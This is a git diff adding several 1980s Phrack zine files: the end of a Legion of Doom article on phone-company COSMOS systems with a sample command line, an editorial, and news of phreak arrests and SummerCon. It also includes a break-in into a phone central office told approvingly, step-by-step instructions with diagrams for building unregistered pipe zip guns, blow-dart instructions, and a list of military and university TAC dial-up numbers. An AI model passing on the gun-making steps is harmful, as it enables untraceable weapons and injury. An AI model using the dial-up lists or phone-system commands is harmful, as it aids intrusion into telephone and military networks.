+Transfer, as well as Work Order (WO) information.  Some of this information
+may be used by the LAC Field Assistance Bureau to assist the outside plant
+craft in obtaining necessary information.
+
+    When conditions necessary for LFACSS to automatically respond to a SOAC AR
+are not met, a RMA noticed is generated in the LAC.  Appropriate people in the
+LAC will interact with LFACS, and maybe SOAC and WM/COSMOS to complete the
+process of assignment.
+
+
+COSMOS
+------
+
+    COSMOS has been written about many times, so I will not go into deep
+detail about this system as many people are already familiar with it.
+
+    COSMOS keeps a database inventory of CO facilities (such as TN, CP, OE,
+CS, BL - telephone number, cable pair, office equipment, class of service,
+bridge lifter respectively) and assigns these facilities to ARs received from
+SOAC as a result of customer SO activity.
+
+    COSMOS assists the Network Administration Center (NAC) and Frame Control
+Center (FCC) in managing, controlling, and utilizing the MDF and COE, as well
+as CO facilities and circuits.  COSMOS does assignment of TNs, line equipment,
+jumper use/reuse, TP management, frame work management, and other things of
+that nature.
+
+    When the conditions are not met for COSMOS to respond to a SOAC AR, a RMA
+is generated in the LAC (as with the other systems mentioned in this article).
+The LAC can then use WM/COSMOS, SOAC, and LFACS to complete assignment.
+
+
+WM
+--
+
+    The WM is what links one set of SOAC/LFACS systems with one or more COSMOS
+systems.  All input to COSMOS from the LAC is directed through the WM.  The WM
+provides message switching, load control, and other functions to the LAC.
+
+-EOF-
+
+RC:LINE;CHNG!/ORD 1/TN LOD-LOD-LODH/ESM YES/ESX YES/ESL YES/RC:TRK!/TNN $LOD$.
+
+    I hope the information presented in this article has been of interest to
+all who read it.  I have not included as much information as I could have,
+some sensitive information has not been included because it could cause
+problems.  My personal thanks goes out to the fine people who designed the
+FACS system, as well as to all the telephone companies in existence, for
+without you, phone phreaks would not exist.  Thank you for allowing us access
+to your networks, although this access is taken rather than given.  Try hiring
+a phreak sometime, it might be beneficial.
+
+    A note to telecom/computer enthusiasts who read this article:  DO NOT
+SCREW ANYTHING UP!  IF YOU ARE NOT RESPONSIBLE ENOUGH TO USE THIS DATA IN A
+WISE AND NON-ABUSIVE WAY THEN DISCARD THIS ARTICLE NOW AND PRETEND LIKE YOU
+NEVER READ IT.
+
+
+This has been a presentation of THE LEGION OF DOOM! (C) 1988+
+==============================================================================
diff --git a/phrack19/6.txt b/phrack19/6.txt
new file mode 100644
index 0000000..3cfed5b
--- /dev/null
+++ b/phrack19/6.txt
@@ -0,0 +1,96 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 19, Phile #6 of 8
+
+Phrack Editorial on Microbashing
+================================
+
+I was toying with the idea of writing a history of the Microcomputer
+Revolution, viewed through the eyes of one who lived through it, perhaps with
+some recollections of a Telecommunications Hobbyist thrown in for spice.
+
+Upon reflection however, I thought that I might use this forum to address a
+problem that has bothered me for some time.  I refer to the phenomena of
+microbashing.
+
+This is, in my opinion, a serious problem in the MicroUnderground.
+
+For the record, I'm 36 years old, I have been screwing around with computers,
+Mainframe, Mini and Micro since 1976/77.  I built an Altair 8800 way back
+when, and wrote what may have been the first software pirating program.
+(Something that mass produced papertape copies of Bill Gates' Altair BASIC).
+I also built a TV Typewriter based on Don Lancaster's designs, and a 100 baud
+modem to go along with it.  For the record, I use a Commodore 64 computer.  I
+have a 1200 baud modem, two disk drives, a spiffy printer and a color monitor.
+For the record, I sold an Apple //e to buy the C64.  I have never regretted
+that decision.
+
+Now, there are those who will read that last sentence and say to themselves,
+"Fuckin' Commie user!  He SOLD an Apple to buy a Commie? What an asshole!"
+Now, I could say to the Apple //e user who thinks that, "You poor boob!  You
+spent all that money for a //e!  Plus all that extra cash for plug in cards so
+it can do what my C64 has built in? Geeze!  Some folks need keepers!"
+
+That, Gentle Readers, is microbashing.  So, in the space of a few minutes,
+this hypothetical exchange has engendered ill feelings, if not outright
+hostility.  What a waste of time and effort!  We both have powerful computers
+that I could not even begin to imagine could exist 12 (12!) years ago.  My
+Altair had 16k of RAM in it, and I thought that was hot stuff!  Most folks
+only had 4 to 8k in their homebrew micros. I even had a disk drive!  A huge
+monster that weighed 20 pounds, used 8 inch single sided disks that had all of
+120k of storage.  This whole system, complete with TeleType (my
+terminal/printer) cost about $5000 in 1977 dollars.  In 1988 dollars, maybe
+$15000.  (My little C64 system, total cost less than $1000 just blows that
+Altair/Teletype out of the water).
+
+What are the roots of microbashing?  I'm not sure, but here are some thoughts.
+
+Status, I'm sure, plays a major role in microbashing.  A C64/128 will always
+cost less than an equivalent Apple //e system.  "My computer cost more than
+your computer!  Therefore, my computer is better!  Nyah!" By that logic, my
+old $5000/$15000 Altair is a better computer than most Apple machines.
+Patently ridiculous, isn't it?  (I've noticed that there is now a Let's Bash
+the //e subculture developing among the Mac Plus, SE and II crowd, along with
+//gs users.  I do take a perverse pleasure, I'm sorry to say, with all this.
+The shoe is now on the other foot, eh?)
+
+Conformity, particularly among the teenage/young adult users, might also be a
+factor.  "Everyone important uses Apples.  Only gameplayers use Kmart toy
+computers.  If you don't use an Apple, you ain't shit!"  The peer pressure of
+Conformity is a powerful thing.
+
+A mate of mine in the Computer Services department at Harvard has a Mac II on
+his desk at work and a Mac Plus at home.  Another friend has a Zenith AT clone
+at his office at the Mitre Corporation in Maryland and an Apple ][+ at home. A
+good friend of mine who's an editor at a major disk-based publication had a
+//gs given to him by Apple.  All these guys are high powered computer users.
+The guy at Harvard is their UNIX wizard.  The fellow in MD is a GS-13 employed
+by the Air Force as a general purpose  MS-DOS/ADA wizard, and just spent
+$1000000 to fund distributed processing research at Los Alamos.  The last
+person is the Apple edition editor at this publication.  Not a single one of
+them wastes a second denigrating my C64.  Now, if these guys consider me a
+peer, an equal, (and they do!) and they don't care what computer I use, why do
+some //e users waste their time and energy putting down the C64?
+
+A third factor may be the sneaking suspicion that, "Geeze!  If a C64 can do
+all that, why did I spend all that money on an Apple?"  Guilt and self doubt
+can be a powerful factor in microbashing.  "If I put Commies down enough,
+maybe other people will buy Apples and then I won't be the only one who has
+one."  Psychologists call that "Transference."  Transferring the negative
+feelings/doubt about oneself to something else and then denigrating that
+something else.  The Old Testament calls it a "Scapegoat."
+
+I suppose what I'm finally trying to say is let's all grow up and stop this
+foolish bickering and sniping.  No one profits, and we all lose.  We lose
+time, information, disk space on BBSs, companionship and fun!  I don't like to
+see some Apple user bashing Commodore.  Neither do I enjoy seeing a C64 user
+bashing a TI user, as I dislike watching that TI user make fun of someone with
+an Adam.  Don't you think we have more important things to do than make
+mountains out of molehills when it comes to our respective computers?
+
+I do.  If we can't act any better than a kindergarten kid whining over a toy,
+then maybe we don't deserve these powerful tools we have sitting on our
+desktops.
+
+Written by THE NIGHTSTALKER, June, 1988.
+==============================================================================
diff --git a/phrack19/7.txt b/phrack19/7.txt
new file mode 100644
index 0000000..f45376a
--- /dev/null
+++ b/phrack19/7.txt
@@ -0,0 +1,83 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 19, Phile #7 of 8
+
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+             PWN                                             PWN
+             PWN      >>>>>=-* Phrack World News *-=<<<<<    PWN
+             PWN                 Issue XVIV/1                PWN
+             PWN                                             PWN
+             PWN          Created by Knight Lightning        PWN
+             PWN   Written and compiled by Knight Lightning  PWN
+             PWN                                             PWN
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+>From The Creators Of Phrack Incorporated...
+
+                             The Phoenix Project
+                             >>>>>>>>>>>>>>>>>>>
+-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Just what is "The Phoenix Project?"
+
+Definition:  Phoenix (fe/niks), n.  A unique mythical bird of great beauty
+                     fabled to live 500 or 600 years, to burn itself to death,
+                     and to rise from its ashes in the freshness of youth, and
+                     live through another life cycle.
+
+             Project (proj/ekt), n.  Something that is contemplated, devised,
+                     or planned.  A large or major undertaking.  A long term
+                     assignment.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Why is "The Phoenix Project?"
+
+On June 1, 1987 Metal Shop Private went down seemingly forever with no
+possible return in sight, but the ideals and the community that formed the
+famous center of learning lived on.  On June 19-21, 1987 the phreak/hack world
+experienced SummerCon'87, an event that brought much of the community together
+whether physically appearing at the convention or in spirit.  On July 22, 1987
+the phreak/hack community was devastated by a nationwide attack from all forms
+of security and law enforcement agencies...thus setting in motion the end of
+the community as we knew it.  Despite the events of July 22, 1987, PartyCon'87
+was held on schedule on July 26-28, 1987 as the apparent final gathering of
+the continent's last remaining free hackers, unknown to them the world they
+sought to protect was already obliterated.  As of August 1, 1987 all of the
+original members and staff of the Metal Shop Triad and Phrack Inc. had decided
+to bail out in the hopes that they could return one day when all would be as
+before...
+
+                             THAT DAY HAS COME...
+
+A new millennium is beginning and it all starts on July 22, 1988.  How fitting
+that the One year anniversary of the destruction of the phreak/hack community
+should coincidentally serve as the day of its rebirth.
+
+Announcing SummerCon '88 in (where else would you expect) St. Louis, Missouri!
+
+Knowledge is the key to the future and it is FREE.  The telecommunications and
+security industries can no longer withhold the right to learn, the right to
+explore, or the right to have knowledge.  The new age is here and with the use
+of every *LEGAL* means available, the youth of today will be able to teach the
+youth of tomorrow.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+SummerCon'88 is a celebration of a new beginning.  Preparations are currently
+underway to make this year's convention twice as fun as last year's and the
+greater the turnout the greater the convention shall be.  No one is directly
+excluded from the festivities and the practice of passing illegal information
+is not a part of this convention (contrary to the opinions of the San
+Francisco Examiner, and they weren't even at the last one).  Anyone interested
+in appearing at this year's convention should leave mail to Crimson Death
+immediately so we can better plan the convention for the correct amount of
+participants.
+
+The hotel rooms purchased for SummerCon'88 are for the specified use of
+invited guests and no one else.  Any security consultants or members of law
+enforcement agencies that wish to attend should contact the organizing
+committee as soon as possible to obtain an invitation to the actual convention
+itself.
+
+Sorry for the short notice this year...
+
+:Knight Lightning                                      "The Future Is Forever"
+
+-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+=============================================================================
diff --git a/phrack19/8.txt b/phrack19/8.txt
new file mode 100644
index 0000000..fc86582
--- /dev/null
+++ b/phrack19/8.txt
@@ -0,0 +1,112 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 19, Phile #8 of 8
+
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+             PWN                                             PWN
+             PWN      >>>>>=-* Phrack World News *-=<<<<<    PWN
+             PWN                 Issue XVIV/2                PWN
+             PWN                                             PWN
+             PWN          Created by Knight Lightning        PWN
+             PWN        Written and compiled by Epsilon      PWN
+             PWN                                             PWN
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Doc Holiday In Legal Trouble
+=== ======= == ===== =======
+
+One night, Doc Holiday 713 decided to visit his CO.  This CO was surrounded by
+a fence with barbed wire on top.  He climbed over the fence with ease and
+looked around the perimeter of the building for any cameras.  When he was sure
+that there were no cameras, he decided to try entering through the back door.
+To his surprise, the back door was unlocked [Hey, at least he didn't get
+charged with breaking and entering, right?  -Epsilon], and he entered the
+building.  He looked around a bit, past some boxes full of test sets and
+cable. This got boring, so he headed down to a room with some terminals and a
+large control panel.  The instructions for using the terminal were taped to
+the side of the desk, so he tried them out.  He had fun monitoring phone lines
+and testing other subscribers' touch tone polarity, and he decided to get out
+of the building.
+
+On his way out of the building, he came across a box that was labeled with
+something to the effect of 'Switching Unit'.  He didn't bother to look inside
+the box, because he was in a hurry to get out of the building, so he opted to
+take the box home, then look inside.  When he opened the door to leave, he saw
+a flashlight waving around in the dark.  He got scared and set the box down
+[Incidentally, this door that he got in through was at the top of a stairway
+at the back of the building, outside.  -Epsilon].  The box was unstable, and
+rolled down the stairs, probably causing damage to whatever was inside.  He
+tried to run down the stairs and climb over the fence.  He found that the
+police were outside the fence, and he proceeded to run.  A policeman shouted
+at him to stop, and threatened to shoot him, so he dropped.  He was
+apprehended and taken to the police station.
+
+He had learned that the police knew about his whereabouts, because he had
+tripped a silent alarm, probably upon entering the building.
+
+At the station, they questioned him.  He was getting fed up, and said he was
+going to leave the station.  He started to leave, when a policeman grabbed him
+and kneeing him, broke his rib.  They then, after some persuasion, took Doc to
+the hospital.
+
+He is at home now, and awaiting a hearing.  This little tiff is not expected
+to affect his hacking activities.
+
+                     Information Provided By Doc Holiday
+______________________________________________________________________________
+
+The Disk Jockey...Busted!
+=== ==== ================
+
+The Disk Jockey, whom we all knew, was arrested for 22 counts of aiding a
+fraud and other miscellaneous charges last Friday.  He is now in jail and is
+being held for $150,000.00 bail [Yes, that's right.  One-hundred-fifty-
+thousand dollars.  -Epsilon].
+
+This incident was believed to have been caused by a 'phreak' by the name of
+White Lightning (616), who informed Sprint Security that The Disk Jockey was
+using their service illegally.
+
+He is now awaiting a court date, and is unavailable for questions.
+
+                     Information Provided By Compaq (219)
+______________________________________________________________________________
+
+SummerCon '88
+========= ===
+
+We at Phrack Inc. are proud to present SummerCon '88.  The convention will
+take place at the Westport Ramada Inn in St. Louis, Missouri the week-end of
+July 22nd.  The Con is expected to be held from Friday afternoon to Sunday
+afternoon.  Please contact us, via the Phrack accounts, or the Phrack In. VMS
+at (800)331-8477, * #, Ext. 6660, if you plan to attend.  Illegal information
+at this CON is not encouraged.  Thank you.
+
+                   Information Provided By Knight Lightning
+______________________________________________________________________________
+
+PWN Quicknotes
+=== ==========
+
+------------------------------------------------------------------------------
+The first step in what is called The Phoenix Project, which is a re-birth of
+the hack/phreak community is underway.  This first step is a public education
+bulletin board system dedicated to teaching the public about
+telecommunications and computer systems.  The board is called The Phoenix
+Project, and the number is (512)754-8182.  No illegal information is to be
+posted on this system.  Our SysOp is The Mentor.  Thank you, and call if
+you're interested.
+
+                      Information Provided By The Mentor
+------------------------------------------------------------------------------
+Rumor has it that a new group is forming in the hack/phreak community.  This
+group is looking for about eight skilled members who have diverse interests.
+If you think you are qualified, and are interested, please contact Doc Holiday
+on any BBS he is on.  Thank you.
+------------------------------------------------------------------------------
+Control C of 313 was NOT busted, contrary to popular belief.  This is all a
+big confusion, and we will let you know how this started in a future issue.
+Until then, please, don't spread the rumor around anymore.
+------------------------------------------------------------------------------
+==============================================================================
+
diff --git a/phrack2/1.txt b/phrack2/1.txt
new file mode 100644
index 0000000..0ca9689
--- /dev/null
+++ b/phrack2/1.txt
@@ -0,0 +1,36 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 1 of 9
+
+                                 Phrack Index
+                                 ~~~~~~ ~~~~~
+
+                 This issue of Phrack Inc. is rather lengthy file-wise
+         compared to issue one.  Phrack Inc. can be found on the
+         following boards regularly:
+
+         Broadway Show                      718-615-0580
+         Newsweek Elite                     617-341-2535
+         Kleptic Palace AE/Catfur           314-527-5551
+         Metal Shop Private                 Request only
+         Metal Shop AE                      Request only
+
+         ...as well as many other BBS's and AE's around the country.
+         Be on the lookout for issue three.  If you wish to submit an
+         article, get in touch with any member of Metal Shop Private
+         and have a message transmitted to me.  Later on.
+
+                                              TARAN KING
+
+         This issue of Phrack Inc. includes the following philes:
+
+         1 Phrack Inc. Index  - Taran King
+         2 Prevention of the Billing Office Blues - Forest Ranger
+         3 Homemade Guns - Man-Tooth
+         4 Blowguns - The Pyro
+         5 Tac Dialups taken from Arpanet - Phantom Phreak        
+         6 Universal Informational Services via ISDN - Taran King
+         7 MCI Overview - Knight Lightning
+         8 Hacking RSTS - Data Line
+         9 Phreak World News - Knight Lightning
+
+
diff --git a/phrack2/2.txt b/phrack2/2.txt
new file mode 100644
index 0000000..acaf93f
--- /dev/null
+++ b/phrack2/2.txt
@@ -0,0 +1,25 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 2 of 9
+
+                    Prevention of the Billing Office Blues
+                           Editorial: Forest Ranger
+
+
+       In an earlier article there were ways explained on bullshiting the
+Billing Office at Bell. By doing so one could disconnect a persons line,
+add call forwarding, call waiting, threeway calling, speed calling, or other
+options that might be available through Bell. Well, this can be very disturbing
+and cause many problems so lets see how this can be prevented. First off, it
+would be a very good idea to call the Billing office for your exchange and ask
+that all inquires made on the your line be verified with you. Is what happens
+now is that Bell marks down in your file that if you decide that you would like
+a certain Bell option added to your line; they will call and check it out with
+you or the person that pays the phone bill. So if someone tries to add
+something onto your line you will be notified before hand. This has two
+advantages, one you will prevent any occurences on your line, two you will know
+that someone is attempting to mess around with your phone line. But, in the end
+you will come out on top because you took the time to listen. And as Smokey the
+Bear says, "Don't Shit in the woods I LIVE HERE!".
+
+
+
diff --git a/phrack2/3.txt b/phrack2/3.txt
new file mode 100644
index 0000000..e34adaf
--- /dev/null
+++ b/phrack2/3.txt
@@ -0,0 +1,143 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 3 of 9
+
+                    :::::::::::::::::::::::::::::::::::::::
+                    :::::::::::::::::::::::::::::::::::::::
+                    @@@@       --] Man-Tooth [--       @@@@
+                    @@@@          presents...          @@@@
+                    @@@@:::::::::::::::::::::::::::::::@@@@
+                    @@@@      -- HOMEMADE GUNS --      @@@@
+                    @@@@:::::::::::::::::::::::::::::::@@@@
+                    @@@@             from              @@@@
+                    @@@@  "The Poor Man's James Bond"  @@@@
+                    @@@@         by Kurt Saxon         @@@@
+                    :::::::::::::::::::::::::::::::::::::::
+                    :::::::::::::::::::::::::::::::::::::::
+
+
+
+          PIPE OR "ZIP" GUNS
+          ------------------
+
+              Commonly known as "zip" guns, guns made from pipe have
+          been used for years by juvenile punks.  Today's Militants
+          make them just for the hell of it or to shoot once in an
+          assassination or riot and throw away if there is any danger
+          of apprehension.
+
+              They can be used many times but with some, a length of
+          dowel is needed to force out the spent shell.
+
+              There are many variations but the illustration shows the
+          basic design.
+
+              First, a wooden stock is made and a groove is cut for
+          the barrel to rest in.  The barrel is then taped securely to
+          the stock with a good, strong tape.
+
+              The trigger is made from galvanized tin.  A slot is
+          punched in the trigger flap to hold a roofing, which is
+          wired or soldered onto the flap. The trigger is bent and
+          nailed to the stock on both sides.
+
+              The pipe is a short length of one-quarter inch steel gas
+          or water pipe with a bore that fits in a cartridge, yet
+          keeps the cartridge rim from passing through the pipe.
+
+              The cartridge is put in the pipe and the cap, with a
+          hole bored through it, is screwed on.  Then the trigger is
+          slowly released to let the nail pass through the hole and
+          rest on the primer.
+
+              To fire, the trigger is pulled back with the left hand
+          and held back with the thumb of the right hand.  The gun is
+          then aimed and the thumb releases the trigger and the thing
+          actually fires.
+
+              Pipes of different lengths and diameters are found in
+          any hardware store.  All caliber bullets, from the .22 to
+          the .45 are used in such guns.
+
+              Some zip guns are made from two or three pipes nested
+          within each other.  For instance, a .22 shell will fit
+          snugly into a length of a car's copper gas line.
+          Unfortunatey, the copper is too weak to withstand the
+          pressure of the firing.  So the length of gas line is spread
+          with glue and pushed into a wider length of pipe.  This is
+          spread with glue and pushed into a length of steel pipe with
+          threads and a cap.
+
+              Using this method, you can accomodate any cartridge,
+          even a rifle shell.  The first size of pipe for a rifle
+          shell accomodates the bullet.  The second accomodates its
+          wider powder chamber.
+
+              A 12-gauge shotgun can be made from a 3/4 inch steel
+          pipe.  If you want to comply with the gun laws, the barrel
+          should be at least eighteen inches long.
+
+              Its firing mechanism is the same as that for the pistol.
+          It naturally has a longer stock and its handle is lengthened
+          into a rifle butt.  Also, a small nail is driven half way
+          into each side of the stock about four inches in the front of
+          the trigger.  The rubber band is put over one nail and
+          brought around the trigger and snagged over the other nail.
+
+              In case you actually make a zip gun, you should test it
+          before firing it by hand.  This is done by first tying the
+          gun to a tree or post, pointed to where it will do no
+          damage.  Then a string is tied to the trigger and you go off
+          several yards.  The string is then pulled back and let go.
+          If the barrel does not blow up, the gun is safe to fire by
+          hand.
+
+              You should not attempt to register such a gun.
+
+
+
+
+
+                          Pipe Cap
+                             /
+                            /   Bullet     Tape       Pipe
+                           /        /      /   \        /
+                           v       /      /     \      /
+                         !----!   /       v     v      v
+               Nail--\  /   /-!---v-----!---!-!---!---------
+                      v ---  - - - - - -!- -!-!- -!- - - - !
+                    //---->    ![][]\   !   ! !   !        !
+                   ^  ! !--\   ![][]/   !   ! !   !        !
+              Wire/   ! !   \-!- - - - -!- -!-!- -!- - - - !
+          Trigger---> ! ! !---!         !   ! !   !     ::::
+                     /! !      /--------!---!-!---!--::::--!
+                    / :::::::::::::::::::::::::::::::: <-\
+                   !  !-!   /                             \-- Rubber
+                   /       /                                    band
+                   !       !
+                   !      /
+                   !      !
+                   !      !
+                   !      !
+                   !------!
+
+
+
+                                  Z I P   G U N
+
+
+                                                       / <---Nail
+                                                   !-!/
+           /------------------\              /-----!o!-----\
+          ! O        O       O !            ! ------------- !
+           \--------! !-------/             !!             !!
+                    !-!                     !!             !!
+                                            !!             !!
+                                            !!             !!
+          Trigger before bending       /--> !!             !! <--\
+                                     Place  !!             !!   Nail
+                                     nail                       hole
+                                     here
+
+                                                  Trigger
+
+
diff --git a/phrack2/4.txt b/phrack2/4.txt
new file mode 100644
index 0000000..fadbb6b
--- /dev/null
+++ b/phrack2/4.txt
@@ -0,0 +1,63 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 4 of 9
+
+                         +--------------------------+
+                         !  How To Make Blow Darts  !
+                         !                          !
+                         !    Written by The Pyro   !
+                         !                          !
+                         !                          !
+                         +--------------------------+
+Blow darts are easy to make and all the materials can be found in your own
+home. These darts can travel a long distance with good penetration if
+constructed correctly.
+
+Materials needed:
+
+A small piece of wood
+A sewing machine needle
+A spool of thread
+A couple nails
+Hammer
+Glue
+Scissors
+
+   Hammer the two nails about two inches apart on the board. Wrap the thread
+tightly around the two nails. The number of times the thread is wrapped around
+the nails will determine the amount of weight and stability the dart has. Once
+you have decided you have wrapped enough thread, cut it close to the nail at
+around a half inch. Take this small tuft of thread and put a dab of glue on the
+folded end. The kind of glue you use is very important. I suggest that you use
+a tacky kind of glue (nothing runny, like Elmer's glue). Attach this to the
+needle and hold until it is dry.
+   Another kind of dart can be made with Q-tips. This kind of dart doesn't work
+as well as the first one, but it is sometimes easier to make. first you have to
+get the kind of Q-tips that have a plastic stem. Cut the Q-tip close to one
+end. Insert the sewing needle into the Q-tip and secure it by melting the
+plastic slightly with a lighter. This kind of dart doesn't last long because
+the cotton come off easily.
+
+Blow Guns:
+
+   Ordinary straws make an excellent blow gun with this kind of dart. Another
+kind can be made with a cheap pen by taking apart the pen and using the shell.
+Any long, cylindrical, object with the diameter of a straw will work very well.
+
+
+        T h e  A l l i a n c e
+
+             618-667-3825
+
+             7pm. to 7am.
+
+
+(>
+=========================================================================
+Received: (from UNKNOWN@HACKERVILLE for HATCHET@VALHALLA via XTC)
+         (UNKNOWN-0481;     185 LINES); Tun, 07 Oct 88 21:12:54 CDT
+Date:    Tun, 07 Oct 88 21:12 CDT
+To:      HATCHET
+From:    UNKNOWN@HACKERVILLE
+
+Comment: converted from FBICIADATA format at 666
+
diff --git a/phrack2/5.txt b/phrack2/5.txt
new file mode 100644
index 0000000..5a7c1ff
--- /dev/null
+++ b/phrack2/5.txt
@@ -0,0 +1,415 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 5 of 9
+
+                        Updated from November 26, 1985
+                        Tac Dialups taken from Arpanet
+                              by Phantom Phreaker
+
+                   TAC DIALUPS SORTED BY LOCATION 26-NOV-85
+
+  State/Country         300 Baud             1200 Baud                1200 Type
+  -------------      ---------------       -----------------          ---------
+
+  ALABAMA
+   Anniston Army Depot [M]
+   (ANNIS-MIL-TAC)   (205) 235-6285 (R4)    (205) 235-7650               B/V
+                     (205) 237-5731 (R8)    (205) 237-5731 (R8)          B/V
+                     (205) 237-5770 (R8)    (205) 237-5779 (R8)          B/V
+                     (205) 237-5805 (R8)    (205) 237-5805 (R8)          B/V
+
+   *Please note:  When accessing the Anniston TAC you must first enter a
+   <RETURN>, then enter DDN <RETURN>.  After you receive CLASS DDN START,
+   proceed as normal.
+
+   Gunter AFS [M]
+   (GUNTER-TAC)      (205) 279-3576
+                     (205) 279-4682
+
+   Redstone Arsenal [M]
+   (MICOM-TAC)       [none known]
+
+  ARIZONA
+   Ft. Huachuca [M]
+   (HUAC-MIL-TAC)    [none known]
+
+   Yuma [M]
+   (YUMA-TAC)        (602) 328-2186         (602) 328-2186               B/V
+                     (602) 328-2187         (602) 328-2187               B/V
+                     (602) 328-2188         (602) 328-2188               B/V
+
+  CALIFORNIA (NORTHERN)
+   Alameda [M]
+   (ALAMEDA-MIL-TAC)     [none known]
+
+   Menlo Park [M]
+   (SRI-MIL-TAC)     (415) 327-5440 (R3)    (415) 327-5440 (R3)          B
+
+   (USGS3-TAC) [M]   [no dialups]
+
+   Moffett Field [M]
+   (AMES-TAC)        [no dialups; contact NSC for access]
+                     William Jones - (415) 694-6482
+                                     (FTS) 494-6482
+                                      (AV) 359-6482
+
+   Monterey [M]
+   (NPS-TAC)         [none known]
+
+   Sacsamento [M]
+   (MCCLELLAN1-MIL-TAC)   [none known]
+   (MCCLELLAN2-MIL-TAC)   [none known]
+
+   Stanford [A]
+   (SU-TAC)          (415) 327-5220
+
+  CALIFORNIA (SOUTHERN)
+   China Lake [M]
+   (NWC-TAC)         [none known]
+
+
+   Edwards AFB [M]
+   (EDWARD-MIL-TAC)  [none known]
+
+   El Segundo [M]
+   (AFSC-SD-TAC)     (213) 643-9204     (213) 643-9204                  B/V
+
+   Los Angeles [A]
+   (USC-TAC)         (213) 749-5436
+
+   Los Angeles [A]
+   (USC-ARPA-TAC)    [none known]
+
+   San Diego [M]
+   (ACCAT-TAC)   (619) 225-1641 (R4)    (619) 225-6903                  V
+                 (619) 225-6946 (R3)
+                                        (619) 223-2148                  V
+                 (619) 226-7884 (R2)
+
+   Santa Monica
+   (RAND-ARPA-TAC) [A]
+                 (213) 393-9230
+                 (213) 393-9237
+                 (213) 393-9238
+                 (213) 393-9239
+
+   (RAND2-MIL-TAC) [M]   [none known]
+
+  COLORADO
+   Denver Fed Ctr [M]
+   (USGS2-TAC)       (303) 232-0206         (303) 232-0206              B/V
+
+   Lowry Air Force Base [M]
+   (LOWRY-MIL-TAC)   [none known]
+
+  D.C.
+   Washington
+    [Andrews AFB] [M]
+   (AFSC-HQ-TAC)  (301) 967-7930 (R16)     (301) 967-7930 (R16)         B
+                  (301) 736-2990 (R4)      (301) 736-2990 (R4)          B
+                  (301) 736-2998 (R2)      (301) 736-2998 (R2)          B
+
+   (PENTAGON-TAC) (202) 553-0229 (R14)  (202) 553-0229 (R14)            B
+
+  FLORIDA
+   Eglin AFB [M]
+   (AFSC-AD-TAC)     (904) 882-8202         (904) 882-8202              B/V
+                     (904) 882-8201         (904) 882-8201              V
+
+   MacDill AFB [M]
+   (MACDILL-MIL-TAC)  [none known]
+
+   Naval Air Station - Jacksonville [M]
+    (JAX1-MIL-TAC)    [none known]
+
+   Naval Air Station - Orlando [M]
+    (ORLANDO-MIL-TAC) [none known]
+
+  GEORGIA
+   Robins AFB [M]
+   (ROBINS-TAC)      (912) 926-2725         (912) 926-2725              B/V
+                     (912) 926-2726
+                     (912) 926-3231
+                     (912) 926-3232
+                     (912) 926-2204         (912) 926-2204              B/V
+   HAWAII
+   Camp H.M. Smith [M]
+   (HAWAII2-TAC)     (808) 487-5545         (808) 487-5545              B
+
+  ILLINOIS
+   Scott AFB [M]
+   (SCOTT-TAC)       [none known]
+
+   (SCOTT2-MIL-TAC)  [none known]
+
+  KANSAS
+   Ft. Leavenworth [M]
+   (LVN-MIL-TAC)     (913) 651-7041 (R8)  (913) 651-7041 (R8)           B
+
+  LOUISIANA
+   Navy Regional Data Automation Center [M]
+   (NORL-MIL-TAC)    (504) 944-7940       (504) 944-7940                B
+                     (504) 944-7948 (R2)  (504) 944-7948 (R2)           B
+                     (504) 944-7951 (R5)  (504) 944-7951 (R5)           B
+                     (504) 944-8702 (R8)  (504) 944-8702 (R8)           B
+
+  MARYLAND
+   Aberdeen Proving Ground [M]
+   (BRL-TAC)      (301) 278-6916 (R4)   (301) 278-6916 (R4)             B/V
+
+   Bethesda [M]
+   (DAVID-TAC)    (202) 227-3526 (R16)  (202) 227-3526 (R16)            B/V
+
+   Patuxent River [M]
+   (PAX-RV-TAC)      (301) 863-4815        (301) 863-4815               B/V
+                     (301) 863-4816        (301) 863-4816               B/V
+                     (301) 863-5750 (R6)   (301) 863-5750 (R6)          B/V
+
+   Silver Spring [M]
+   (WHITEOAK-MIL-TAC)   (301) 572-5960 (R10)   (301) 572-5960 (R10)     B
+                        (301) 572-5970 (R10)   (301) 572-5970 (R10)     B
+
+  MASSACHUSETTS
+   Hanscom AFB [M]
+   (AFGL-TAC)     (617) 861-3000 (R8)   (617) 861-3000 (R8)             B
+                  (617) 861-4965 (R8)   (617) 861-4965 (R8)
+
+   Cambridge
+   (BBN-MIL-TAC) [M]   [none known]
+
+   (BBN-ARPA-TAC) [A]  [no dialup capability]
+
+   (CCA-ARP-TAC) [A]   [none known]
+
+   (MIT-TAC) [A]
+                        (617) 491-5669        (617) 258-6224            V
+                        (617) 491-5708        (617) 258-6225            V
+                        (617) 491-5734        (617) 258-6227            V
+                        (617) 491-5819        (617) 258-6248            V
+                        (617) 491-5826
+                        (617) 491-5841
+                        (617) 491-5849
+                        (617) 491-6769
+                        (617) 491-6772
+                        (617) 491-6937
+                        (617) 258-6241
+                        (617) 258-6242
+                        (617) 258-6243
+
+  MICHIGAN
+   U.S. Army Tank Automotive Command (TACOM) - Warren [M]
+   (TACOM-TAC)       [none known]
+
+  MISSOURI
+   St. Louis [M]
+   (STLA-TAC)        [none known]
+
+  NEBRASKA
+   Offutt AFB [M]
+   (SAC1-MIL-TAC)    [none known]
+
